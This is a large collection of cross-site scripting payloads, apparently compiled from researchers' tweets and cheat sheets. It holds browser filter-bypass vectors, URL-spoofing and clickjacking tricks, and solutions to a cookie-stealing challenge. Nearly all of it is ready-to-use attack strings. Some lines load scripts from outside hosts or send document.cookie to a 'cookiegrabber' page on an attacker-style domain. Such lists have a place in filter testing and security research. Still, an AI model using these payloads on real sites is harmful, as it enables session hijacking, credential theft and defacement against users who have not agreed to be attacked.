'';!--"=&{()}
','')); phpinfo(); exit;/*
var n=0;while(true){n;}]]>
SCRIPT]]>alert('XSS');/SCRIPT]]>
SCRIPT]]>alert('XSS');/SCRIPT]]>
]]>
<IMG SRC="javascript:alert('XSS')">
TWITTER @xssvector Tweets:
Opera cross-domain set cookie 0day: document.cookie='xss=jackmasa;domain=.me.'
Reverse 401 basic auth phishing by @jackmasa POC:
document.domain='com' chrome/safari same domain suffix cross-domain trick.
Safari empty location bar bug by @jackmasa POC:
Safari location object pollution tech: by @kinugawamasato
Safari URL spoofing about://mmme.me POC:
Opera URL spoofing vuln data://mmme.me by @jackmasa POC:
Universal URL spoofing data:;//mmme.me/view/1#1,2 #firefox #safari #opera
New dom xss vector xxx.innerHTML=document.title by @0x6D6172696F
Opera data:message/rfc822 #XSS by @insertScript
#IE
IE cool expression xss
Clever webkit xss auditor bypass trick <scRipt %00>prompt(/@soaj1664ashar/)
IE xss filter bypass 0day : <xml:namespace prefix=t><import namespace=t implementation=..... by @gainover1 #IE #0day
<iframe srcdoc='<svg/onload=alert(/@80vul/)>'> #chrome
IE xss filter bypass 0day :<script/%00%00v%00%00>alert(/@jackmasa/) and %c0″//(%000000%0dalert(1)// #IE #0day
new XMLHttpRequest().open("GET", "data:text/html,", false); #firefox #datauriXSS
*:after{content:url()} #firefox
alert(/@ma1/) #IE
"clickme #IE #xssfilter @kinugawamasato
Components.lookupMethod(self, 'alert')(1) #firefox
external.NavigateAndFind(' ',[],[]) #IE #URLredirect
IE decides charset as #utf-7 @hasegawayosuke
#opera
#chrome
MsgBox"@insertScript"<i> #IE9 #svg #vbscript
setTimeout(['alert(/@garethheyes/)']); #chrome #safari #firefox
<svg></ y="><x" onload=alert('@0x6D6172696F')> #svg
Event.prototype[0]='@garethheyes',Event.prototype.length=1;Event.prototype.toString=[].join;onload=alert #webkit #opera
URL-redirect vuln == XSS ! Location:data:text/html,<svg/onload=alert(document.domain)> #Opera @jackmasa
<a href="data:application/x-x509-user-cert;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">click</a> #Chrome #XSS @RSnake
Clipboard-hijack without script and css: http://<bdo dir=rtl>elgoog</bdo>.com
Opera:<style>*{-o-link:'data:text/html,<svg/onload=alert(/@garethheyes/)>';-o-link-source:current}</style><a href=1>aaa
$=<>@mozilla.org/js/function</>;$::[<>alert</>](/@superevr/) #firefox
Firefox cookie xss: with(document)cookie='∼≩≭≧∯≳≲≣∽≸≸∺≸∠≯≮≥≲≲≯≲∽≡≬≥≲≴∨∱∩∾',write(cookie); by @jackmasa
<svg><script>location=<>javascript&#x3A;alert(1)<!/> #Firefox #JustForFun
Just don't support IE click
//<!-- -->*{x:expression(alert(/@jackmasa/))}//
#IE #XSS
Input[hidden] XSS target it.
Firefox clipboard-hijack without script and css : http://
#E4X <{alert(1)}>{alert(2)}>.(alert(3)).@wtf.(wtf) by @garethheyes
#vbscript coool feature chr(&H4141)="A", Chr(7^5)=A and Chr(&O41) =‘A’ by @masa141421356
({})[$='\143\157\156\163\164\162\165\143\164\157\162'][$]('\141\154\145\162\164\50/ @0x6D6172696F /\51')()
No referer :
/**/alert(' @0x6D6172696F ')//*/
#VBScript Event Handling: [Sub XXX_OnError MsgBox " @0x6D6172696F " End Sub]
if(1)alert(' @jackmasa ')}{ works in firebug and webkit's console
alert(1) #opera by @soaj1664ashar
<![if<iframe/onload=vbs::alert[:]> #IE by @0x6D6172696F, @jackmasa
<svg><script/XL:href= data:;;;base64;;;;,<>啊YWx啊lc啊nQ啊oMSk啊=> mix! #opera by @jackmasa
<! XSS="><img src=xx:x onerror=alert(1)//"> #Firefox #Opera #Chrome #Safari #XSS
document.body.innerHTML=('<\000\0i\000mg src=xx:x onerror=alert(1)>') #IE #XSS
header('Refresh: 0;url=javascript:alert(1)');
<script language=vbs>
click
#CSS expression *{font-family:'Serif}';x[value=expression(alert(URL=1));]{color:red}
#ES #FF for(location of ['javascript:alert(/ff/)']);
#E4X function::['location']='javascript'':alert(/FF/)'
HTML5 entity char test
#Firefox click eval(test'') by @cgvwzq
CSS and CSS :P
toUpperCase XSS document.write('<ı onclıck=alert(1)>asdı>'.toUpperCase()) by @jackmasa
IE6-8,IE9(quick mode) with jQuery<1.7 $("button").val("") by @masa141421356
aha alert(/IE|Opera/)
Opera bug?
Use 127.1 no 127.0.0.1 by @jackmasa
IE vector location='vbscript:alert(1)'
#jQuery super less-xss,work in IE: $(URL) 6 chars
#Bootstrap tooltip.js xss some other plugins (e.g typeahead,popover) are also the same problem //cc @twbootstrap
innerText DOM XSS: innerHTML=innerText
Using IE XSS filter or Chrome xss auditor to block url redirect.
jQuery 1.8 a new method: $.parseHTML('')
IE all version CSRF vector
Timing vector
Firefox data uri can inherit dom-access.
IE9
Webkit and FF
Firefox E4X vector alert(<xss>xs{[function::status]}s</xss>) it is said E4H would replace E4X :P
IE8 document.write('<img src="<iframe/onload=alert(1)>\0">')
If you want to share your cool vector, please do not hesitate to let me know :)
ASP trick: ?input1=<script/&in%u2119ut1=>al%u0117rt('1')</script> by @IRSDL
New spec:<iframe srcdoc="<svg/onload=alert(domain)>"> #chrome 20 by @0x6D6172696F
#Firefox syntax broken try{*}catch(e if(alert(1))){} by @garethheyes
JSON XSS Tips: /json.cgi?a.html by @hasegawayosuke
JSON XSS Tips: /json/.html with PHP and .NET by or /json;.html with JSP by @superevr
ß=ss <a href="http://ß.lv">click</a> by @_cweb
<a href="http://www。example。com">click</a> by @_cweb
Firefox link host dom xss https://t.co/aTtzHaaG by @garethheyes
<a href="http://www﹒example﹒com ">click</a> by @_cweb
history.pushState([],[],'/xssvector') HTML5 URL spoofing!
Clickjacking with history.forward() and history.back() by @lcamtuf
Inertia-Clickjacking for(i=10;i>1;i--)alert(i);new ActiveXObject("WScript.shell").Run('calc.exe',1,true); by @80vul
XHTML Entity Hijacking [<!ENTITY nbsp "'">] by @masa141421356
Firefox <img src=javascript:while([{}]);>
IE <!--[if<img src=x:x onerror=alert(5)//]--> by @0x6D6172696F H5SC#115
Firefox funny vector for(i=0;i<100;) find(); by @garethheyes
IE breaking framebusting vector <script>var location={};</script>
IE JSON hijack with UTF-7 json={'x':'',x:location='1'} <script src=... charset=utf-7></script>
Firefox <iframe src=view-source://xxxx.com>; with drag and drop
<button form=hijack_form_id formaction=//evil style="position:absolute;left:0;top:0;width:100%;height:100%"><plaintext> form hijacking
Dangling markup injection <img src='//evil by @lcamtuf
Webkit <iframe> viewsource attribute: // <iframe viewsource src="//test.de"></iframe> by @0x6D6172696F
DOM clobbering:<form name=location > clobbered location object on IE.
DOM clobbering:<form name=document><image name=body> clobbered document->body
<isindex formaction=javascript:alert(1)> by @jackmasa
Classic IE backtick DOM XSS: <img src="xx:x" alt="``onerror=alert(1)"><script>document.body.innerHTML=''</script>
Firefox <a href="https://4294967298915183000">click</a>=>google by @garethheyes
<a href="data:text/html;base64xoxoxox,<body/onload=alert(1)>">click</a> by @kkotowicz
Opera <a href="data:text/html;base64,PHN2Zy萨9vbmxv晕YWQ<>>9YWxlc>>>nQoMSk">click</a> variant base64 encode. by @jackmasa
Opera <svg><image x:href="data:image/svg-xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(1)'%3E%3C/svg%3E"> by LeverOne H5SC#88
Webkit and Opera <a href="\/www.google.com/favicon.ico">click</a> by @kkotowicz
FF <a href="//ⓜⓜⓜⓔ︒ⓜⓔ">click</a> url trick by @jackmasa
IE <script>-{valueOf:location,toString:[].pop,0:'vbscript:alert%281%29',length:1}</script> @thornmaker , @sirdarckcat
<i/onclick=URL=name> IE less xss,20 chars. by @0x6D6172696F
<a rel="noreferrer" href="//google.com">click</a> no referrer by @sneak_
FF <img src="jar:!/"> no referrer by @sneak_
No dos expression vector <i style=x:expression(alert(URL=1))> by @jackmasa
<svg><style>*{font-family:'<svg onload=alert(1)>';} by @0x6D6172696F
JSLR( @garethheyes ) challenge result:
@irsdl challenge result:
Vbscript XHR by @masa141421356
XML Entity XSS by @garethheyes
Webkit cross-domain and less vector! example: (JSFiddle cross to JSBin) by @jackmasa
@import//evil? >>>steal me!<<< scriptless by @garethheyes
IE <input value="<script>alert(1)</script>" ` /> by @hasegawayosuke
<xmp><img alt="</xmp><img src=xx:x onerror=alert(1)//"> Classic vector by slacker :D
<a href="#" onclick="alert(' ');alert(2 ')">name</a> Classic html entity inject vector
A nice opera xss: Put 65535 Bytes before and Unicode Sign by @insertScript
<iframe src="jar://html5sec.org/test.jar!/test.html"></iframe> Upload a jar file => Firefox XSS by @0x6D6172696F
JS Array Hijacking with MBCS encodings ppt by @hasegawayosuke
<meta http-equiv="refresh" content="0;url=http://good/[>>>inj];url=http://evil/[<<<inj]"> IE6-7 Inject vector by @kinugawamasato
IE UTF7 BOM XSS <link rel=stylesheet href='data:,?*%7bx:expression(alert(1))%7D' > by @garethheyes
<svg><script>a='<svg/onload=alert(1)></svg>';alert(2)</script> by @0x6D6172696F , @jackmasa
Opera <svg><animation x:href=javascript:alert(1)> SVG animation vector by @0x6D6172696F
<meta charset=gbk><script>a='xࠄ\';alert(1)//';</script> by @garethheyes
FF <a href="data:),< s c r i p t > a l e r t ( document.domain ) < / s c r i p t >">CLICK</a> by @0x6D6172696F
<noscript><!--</noscript><img src=xx:x onerror=alert(1) --> non-IE
<svg><script xlink:href="data:,alert(1)"> by @0x6D6172696F
Firefox statusline spoofing<math><maction actiontype="statusline#http://google.com" href="//evil">click by LeverOne
<svg><oooooo/oooooooooo/onload=alert(1) > by @jackmasa
<math><script>sgl='<img/src=xx:x onerror=alert(1)>'</script> chrome firefox opera vector by @jackmasa
FF <applet code=javascript:alert('sgl')> by @jackmasa
Nice IE DOM XSS: <div id=d><x xmlns="><body onload=alert(1)"><script>d.innerHTML=‘’</script> by LeverOne
<script>RuntimeObject("w*")["window"]["alert"](1);</script> IE a new method get window object! by @s_hskz
<body onload="$})}}}});alert(1);({0:{0:{0:function(){0({"> Chrome crazy vector! by @cgvwzq
IE <!-- `<img/src=xx:xx onerror=alert(1)//--!> by @jackmasa H5SC:
<a href="javascript:alert(1)">click</a> non-IE
<a href="feed:javascript:alert(1)">click</a> Firefox
<link href="javascript:alert(1)" rel="next"> Opera, pressing the spacebar execute! by @shafigullin
<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always> works on webkit by @garethheyes
MORE VECTORS:
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
"><script>alert(0)</script>
<script src=http://yoursite.com/your_files.js></script>
</title><script>alert(/xss/)</script>
</textarea><script>alert(/xss/)</script>
<IMG LOWSRC="javascript:alert('XSS')">
<IMG DYNSRC="javascript:alert('XSS')">
<font style='color:expression(alert(document.cookie))'>
<img src="javascript:alert('XSS')">
<script language="JavaScript">alert('XSS')</script>
[url=javascript:alert('XSS');]click me[/url]
<body onunload="javascript:alert('XSS');">
<script>alert(1);</script>
<script>alert('XSS');</script>
<script src="http://www.evilsite.org/cookiegrabber.php"></script>
<script>location.href="http://www.evilsite.org/cookiegrabber.php?cookie="??(document.cookie)</script>
<scr<script>ipt>alert('XSS');</scr</script>ipt>
<script>alert(String.fromCharCode(88,83,83))</script>
<img src=foo.png onerror=alert(/xssed/) />
<style>@import'javascript:alert("XSS")';
echo('alert("XSS")'); ?>
alert('XSS')
window.alert("Bonjour !");
onload=alert('XSS')>
'>><marquee><h1>XSS</h1></marquee>
'">><script>alert('XSS')
'">>XSS
var var = 1; alert(var)
BODY{background:url("javascript:alert('XSS')")}
='alert("XSS")'?>
" onfocus=alert(document.domain) "> <"
li {list-style-image: url("javascript:alert('XSS')");}
perl -e 'print "alert("XSS")";' > out
perl -e 'print "";' > out
alert(1)
document.write("XSS");
a="get";b="URL";c="javascript:";d="alert('xss');";eval(a?);
='>alert("xss")"?="http://yoursite.com/xss.js?69,69">
alert(navigator.userAgent)>
">/XaDoS/>alert(document.cookie)
src="http://www.site.com/XSS.js">
">/KinG-InFeT.NeT/>alert(document.cookie)
src="http://www.site.com/XSS.js">
[color=red width=expression(alert(123))][color]
Execute(MsgBox(chr(88)&chr(83)&chr(83)))<
">alert(123)
'">alert(1111)
'">alert(document.cookie)
'""> alert('X nS nS');
<<<<>>>><<<script>alert(123)
'>alert(123)
'>">
}a=eval;b=alert;a(b(/XSS/.source));
(123)(123)
<alert("XSS");//<
<IMG SRC="javascript:alert('XSS')"
<iframe src=http://ha.ckers.org/scriptlet.html <
";alert('XSS');//
</TITLE><SCRIPT>alert("XSS");
@import'http://ha.ckers.org/xss.css';
BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}
@import'javascript:alert("XSS")';
.XSS{background-image:url("javascript:alert('XSS')");}
BODY{background:url("javascript:alert('XSS')")}
href="javascript:alert(-1)">hello
" onhover="javascript:alert(-1)"
">alert('test')
ha.ckers.org / sla.ckers.org';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//>--!>alert(String.fromCharCode(88,83,83))
alert("XSS")">
<SCRIPT SRC=//ha.ckers.org/.j>
<SCRIPT>a=/XSS/
alert(a.source)
alert("XSS");
@im\port'\ja\vasc\ript:alert("XSS")';
exp/*
alert('XSS');
<IMG SRC="javascript:alert('XSS')">
alert('XSS');
" SRC="http://ha.ckers.org/xss.js">
'" SRC="http://ha.ckers.org/xss.js">
` SRC="http://ha.ckers.org/xss.js">
document.write("<SCRI");PT SRC="http://ha.ckers.org/xss.js">
100 #XSS Vectors by @soaj1664ashar
{font-family:'<iframe/onload=confirm(1)>'
<input/onmouseover="javaSCRIPT:confirm(1)"
<sVg><scRipt %00>alert(1) {Opera}
<img/src=`%00` onerror=this.onerror=confirm
<form><isindex formaction="javascript:confirm(1)"
<img src=`%00`
 onerror=alert(1)

<script/	 src='https://dl.dropbox.com/u/13018058/js.js' /	></script>
<ScRipT 5-0*3?=>prompt(1)</ScRipT giveanswerhere=?
<iframe/src="data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
<script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/
"><h1/onmouseover='\u0061lert(1)'>%00
<iframe/src="data:text/html,<svg onload=alert(1)>">
<meta content="
 1 
; JAVASCRIPT: alert(1)" http-equiv="refresh"/>
<svg><script xlink:href=data:,window.open('https://www.google.com/')></script
<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
<meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
<iframe src=javascript:alert(document.location)>
<form><a href="javascript:\u0061lert(1)">X
</script><img/*%00/src="worksinchrome:prompt(1)"/%00*/onerror='eval(src)'>
<img/	  src=`~` onerror=prompt(1)>
<form><iframe 	  src="javascript:alert(1)" 	;>
<a href="data:application/x-x509-user-cert;
base64
,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="	 >X</a
http://www.google<script .com>alert(document.location)</script
<a href=[�]"� onmouseover=prompt(1)//">XYZ</a
<img/src=@  onerror = prompt('1')
<style/onload=prompt('XSS')
<script ^__^>alert(String.fromCharCode(49))</script ^__^
/**/alert(document.location)/**/
/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/
alert(0%0)
<///style///><span %2F onmousemove='alert(1)'>SPAN
<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=	prompt(1)
"><svg><style>{-o-link-source:'<body/onload=confirm(1)>'
<blink/ onmouseover=prompt(1)>OnMouseOver {Firefox & Opera}
<marquee onstart='javascript:alert(1)'>^__^
<div/style="width:expression(confirm(1))">X</div> {IE7}
<iframe/%00/ src=javaSCRIPT:alert(1)
//<form/action=javascript:alert(document.cookie)><input/type='submit'>//
/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt/*iframe/src*/>
//|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\
</font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/
|\>''alert(1) {Opera}
<a href="javascript:\u0061le%72t(1)"><button>
<div onmouseover='alert(1)'>DIV</div>
<iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
<a href="jAvAsCrIpT:alert(1)">X</a>
<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
<var onmouseover="prompt(1)">On Mouse Over</var>
<a href=javascript:alert(document.cookie)>Click Here</a>
<img src="/" =_=" title="onerror='prompt(1)'">
<%<!--'%><script>alert(1);
http://www.alert(1)
alert(1)
<iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe>
<img src=`xx:xx`onerror=alert(1)>
<object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>
<meta http-equiv="refresh" content="0;javascript:alert(1)"/>
<math><a xlink:href="//jsfiddle.net/t846h/">click
<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
<svg contentScriptType=text/vbs><script>MsgBox
<a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a
<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u006worksinIE>
<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')
++1-+?(1)
/*<script* */alert(1)//
confirm(1);
alert(1)
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe
<script x> alert style="x:">
<--` --!>
AND EVEN MORE:
'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eshadowlabs(0x000045)%3C/script%3E
<window.onload=function(){document.forms[0].message.value='1';}
x”
document.getElementById(%22safe123%22).setCapture(); document.getElementById(%22safe123%22).click();
Object.defineProperties(window, {Safe: {value: {get: function() {return document.cookie}}}});alert(Safe.get())
var x = document.createElement('iframe');document.body.appendChild(x);var xhr = x.contentWindow.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();
(function() {var event = document.createEvent(%22MouseEvents%22);event.initMouseEvent(%22click%22, true, true, window, 0, 0, 0, 0, 0, false, false, false, false, 0, null);var fakeData = [event, {isTrusted: true}, event];arguments.__defineGetter__('0', function() { return fakeData.pop(); });alert(Safe.get.apply(null, arguments));})();
var script = document.getElementsByTagName('script')[0]; var clone = script.childNodes[0].cloneNode(true); var ta = document.createElement('textarea'); ta.appendChild(clone); alert(ta.value.match(/cookie = '(.*?)'/)[1])
xhr=new ActiveXObject(%22Msxml2.XMLHTTP%22);xhr.open(%22GET%22,%22/xssme2%22,true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();
alert(document.documentElement.innerHTML.match(/'([^']%2b)/)[1])
alert(document.getElementsByTagName('html')[0].innerHTML.match(/'([^']%2b)/)[1])
<%73%63%72%69%70%74> %64 = %64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74(%22%64%69%76%22); %64%2e%61%70%70%65%6e%64%43%68%69%6c%64(%64%6f%63%75%6d%65%6e%74%2e%68%65%61%64%2e%63%6c%6f%6e%65%4e%6f%64%65(%74%72%75%65)); %61%6c%65%72%74(%64%2e%69%6e%6e%65%72%48%54%4d%4c%2e%6d%61%74%63%68(%22%63%6f%6f%6b%69%65 = '(%2e%2a%3f)'%22)[%31]); %73%63%72%69%70%74>
var xdr = new ActiveXObject(%22Microsoft.XMLHTTP%22); xdr.open(%22get%22, %22/xssme2%3Fa=1%22, true); xdr.onreadystatechange = function() { try{ var c; if (c=xdr.responseText.match(/document.cookie = '(.*%3F)'/) ) alert(c[1]); }catch(e){} }; xdr.send();
ifr = document.getElementById('ifra'); ifr.contentDocument.write(%22<scr%22 %2b %22ipt>top.foo = Object.defineProperty</scr%22 %2b %22ipt>%22); foo(window, 'Safe', {value:{}}); foo(Safe, 'get', {value:function() { return document.cookie }}); alert(Safe.get());
alert(document.head.innerHTML.substr(146,20));
alert(document.head.childNodes[3].text)
var request = new XMLHttpRequest();request.open('GET', 'http://html5sec.org/xssme2', false);request.send(null);if (request.status == 200){alert(request.responseText.substr(150,41));}
Object.defineProperty(window, 'Safe', {value:{}});Object.defineProperty(Safe, 'get', {value:function() {return document.cookie}});alert(Safe.get())
x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%22)};document.body.appendChild(x);
x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>Object.defineProperty(parent,'Safe',{value:{}});Object.defineProperty(parent.Safe,'get',{value:function(){return top.document.cookie}});alert(parent.Safe.get())<\/script>%22)};document.body.appendChild(x);
var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi); alert(RegExp.%241); } } xmlHttp.send(null); };
document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%22).click({'type':'click','isTrusted':true});
var+MouseEvent=function+MouseEvent(){}; MouseEvent=MouseEvent var+test=new+MouseEvent(); test.isTrusted=true; test.type='click'; document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%22).click(test);
(function (o) { function exploit(x) { if (x !== null) alert('User cookie is ' %2B x); else console.log('fail'); } o.onclick = function (e) { e.__defineGetter__('isTrusted', function () { return true; }); exploit(Safe.get()); }; var e = document.createEvent('MouseEvent'); e.initEvent('click', true, true); o.dispatchEvent(e); })(document.getElementById('safe123'));function b() { return Safe.get(); } alert(b({type:String.fromCharCode(99,108,105,99,107),isTrusted:true}));
function foo(elem, doc, text) { elem.onclick = function (e) { e.__defineGetter__(text[0], function () { return true }) alert(Safe.get()); }; var event = doc.createEvent(text[1]); event.initEvent(text[2], true, true); elem.dispatchEvent(event); } #
MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;getElementById(%22safe123%22).click=function()+{alert(Safe.get());};getElementById(%22safe123%22).click(test);#
var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi); alert(RegExp.%241); } } xmlHttp.send(null); }; #
getElementById('safe123').click()
var+x+=+showModelessDialog+(this); alert(x.document.cookie);
location.href = 'data:text/html;base64,PHNjcmlwdD54PW5ldyBYTUxIdHRwUmVxdWVzdCgpO3gub3BlbigiR0VUIiwiaHR0cDovL3hzc21lLmh0bWw1c2VjLm9yZy94c3NtZTIvIix0cnVlKTt4Lm9ubG9hZD1mdW5jdGlvbigpIHsgYWxlcnQoeC5yZXNwb25zZVRleHQubWF0Y2goL2RvY3VtZW50LmNvb2tpZSA9ICcoLio/KScvKVsxXSl9O3guc2VuZChudWxsKTs8L3NjcmlwdD4=';
r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22>
var x = safe123.onclick;safe123.onclick = function(event) {var f = false;var o = { isTrusted: true };var a = [event, o, event];var get;event.__defineGetter__('type', function() {get = arguments.callee.caller.arguments.callee;return 'click';});var _alert = alert;alert = function() { alert = _alert };x.apply(null, a);(function() {arguments.__defineGetter__('0', function() { return a.pop(); });alert(get());})();};safe123.click();#
'%2Blocation.hash.substr(1)%2B'')%22>#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();
ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie = '(.*?)'/)[1])'%2Blocation.hash.substr(1)%2B'')%22>#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();
ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie = '(.*?)'/)[1])
function x(window) { eval(location.hash.substr(1)) }#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();
alert(1)')%22 autofocus>function x(window) { eval(location.hash.substr(1)) }; open(%22javascript:opener.x(window)%22)#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();
%3Cscript%3Exhr=new%20ActiveXObject%28%22Msxml2.XMLHTTP%22%29;xhr.open%28%22GET%22,%22/xssme2%22,true%29;xhr.onreadystatechange=function%28%29{if%28xhr.readyState==4%26%26xhr.status==200%29{alert%28xhr.responseText.match%28/%27%28[^%27]%2b%29/%29[1]%29}};xhr.send%28%29;%3C/script%3E
<svg contentScriptType=text/vbs><script>MsgBox+1
<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
+-+-1-+-+alert(1)/*<script* */alert(1)//
<script x> alert(1) style="x:">